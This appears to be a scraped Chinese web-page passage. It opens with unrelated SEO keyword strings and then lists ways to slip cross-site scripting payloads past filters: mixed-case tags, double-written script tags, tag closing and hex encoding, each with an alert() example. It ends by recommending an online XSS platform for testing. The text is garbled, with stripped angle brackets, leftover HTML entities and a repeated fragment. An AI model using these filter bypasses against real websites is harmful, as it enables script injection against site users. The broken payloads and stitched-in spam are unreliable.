网站服务器免费吗,网站标题 没有排名,白银市建设局网站,建站网站哪个好大小写绕过也不行 ScRiptALeRt(“XSS”);/sCRipT 双写绕过可以 scscriptriptalert(z)/scscriptript 改变大小写
在测试过程中#xff0c;我们可以改变测试语句的大小写来绕过XSS规则#xff1a;
比如#xff1a;scriptalert(“xs… 大小写绕过也不行 ScRiptALeRt(“XSS”);/sCRipT 双写绕过可以 scscriptriptalert(z)/scscriptript 改变大小写
在测试过程中我们可以改变测试语句的大小写来绕过XSS规则
比如scriptalert(“xss”);/script可以转换为 ScRiptALeRt(“XSS”);/sCRipT
关闭标签
有时候我们需要关闭标签来使我们的XSS生效。
比如“scriptalert(“Hi”);/script
使用hex编码绕过
我们可以对我们的语句进行hex编码来绕过XSS规则
比如scriptalert(“xss”);/script可以转换为 %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e
所以确定了过滤方式之后找个xss平台https://xssaq.com测试一下
